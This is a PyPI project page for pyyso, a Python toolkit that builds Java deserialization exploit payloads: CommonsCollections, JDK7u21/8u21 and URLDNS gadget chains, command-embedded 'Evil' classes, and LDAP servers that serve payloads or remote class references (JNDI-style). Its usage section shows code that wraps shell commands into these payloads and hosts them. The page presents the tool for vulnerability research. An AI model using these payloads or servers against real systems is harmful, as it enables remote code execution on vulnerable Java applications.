a java serialized tool written in python

These details have not been verified by PyPI

Project links

Project description

pyyso: powerful java serialized toolkit

What is it?

pyyso is a Python package that provides fast and flexible ways to generate java serialized poc. It aims to be the fundamental high-level building block for doing vulnerability check and research in Python. Additionally, it has a goal of becoming the most convenient and reliable toolkit implemented in Python for Java researchers

Main Features

Here are just a few of the things that pyyso does well:

Easy generating of java serialized poc
Powerful, flexible functionality to start a ldap/rmi server to host java serialized pocs
Communicating and collaborating with other Python packages

pyyso has implemented

URLDNS Gadget
CommonCollections1-7 Gadgets
JDK7u21 Gadget
JDK8u21 Gadget
java class embed with command
ldap server hosting java serialized pocs
ldap server hosting java remote reference factory

Where to get it

The source code is currently host on GitHub at: https://github.com/cokeBeer/pyyso

Installation from sources

pip install pyyso

How to use

First import pyyso

import pyyso

to generate a java serialized zed poc use:

pyyso.urldns("https://x.dnslog.com") #return java serialzed data of URLDNS in bytes
pyyso.cc1("touch /tmp/1") #return java serialzed data of CommonColletions1 in bytes
pyyso.cc2("touch /tmp/1") #return java serialzed data of CommonColletions2 in bytes
pyyso.jdk7u21("touch /tmp/1") #return java serialzed data of JDK7u21 in bytes
pyyso.jdk8u20("touch /tmp/1") #return java serialzed data of JDK8u20 in bytes

to generate a java class embed with command use:

pyyso.evil("touch /tmp/1") #return java class embed with command in bytes

to start a ldap server hosting java serialized pocs:

serobj=pyyso.cc1("touch /tmp/1")
server=pyyso.LdapSerialized(serobj=serobj, ip="0.0.0.0", port=1389)
server.run()

this will start a ldap server listening 0.0.0.0:1389
you can change the hosted java serialized data by:

server.serobj=pyyso.cc1("rm /tmp/2")

to start a ldap server hosting java remote reference factory:

server=pyyso.LdapRemoteRef(javaCodeBase="http://127.0.0.1:8088/", javaFactory="Evil", javaClassName="java.lang.String", ip="0.0.0.0", port=1389):
server.run()

this will start a ldap server listening 0.0.0.0:1389
and will return a remote reference pointer to http://127.0.0.1:8088/Evil.class

License

MIT

Inspired by

https://github.com/frohoff/ysoserial
https://github.com/mbechler/marshalsec

Project details

These details have not been verified by PyPI

Project links

Release history Release notifications | RSS feed

0.0.11

Nov 5, 2022

0.0.10

May 24, 2022

0.0.9

May 16, 2022

0.0.8

May 15, 2022

0.0.7

May 15, 2022

0.0.6

May 15, 2022

0.0.5

Mar 23, 2022

This version

0.0.2

Mar 18, 2022

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

pyyso-0.0.2.tar.gz (10.9 kB view hashes)

Uploaded Mar 18, 2022 Source

Built Distribution

pyyso-0.0.2-py3-none-any.whl (10.2 kB view hashes)

Uploaded Mar 18, 2022 Python 3

Hashes for pyyso-0.0.2.tar.gz

Hashes for pyyso-0.0.2.tar.gz
Algorithm	Hash digest
SHA256	`787fb70743f670bea46be061daa231c80135300a8c2374eb6f6d7410d58744dd`
MD5	`58a2fb9a64cf53e529d4262bd119faea`
BLAKE2b-256	`7d20cf8e6c7bf48e61393f9bbcb4c0ee45c06215dd2cdddd3523a26beb961c96`

Hashes for pyyso-0.0.2-py3-none-any.whl

Hashes for pyyso-0.0.2-py3-none-any.whl
Algorithm	Hash digest
SHA256	`66e861ca0056792e2bba3c7868c69ca72472d56a5c330857001fef9e85e817b8`
MD5	`b10a97831812f2f5918aeb58b3e4a6f1`
BLAKE2b-256	`7f7828cfc7c13b5667c58e6cb7f89ab05e9aab3ee0b995dcc6dffe9328c76855`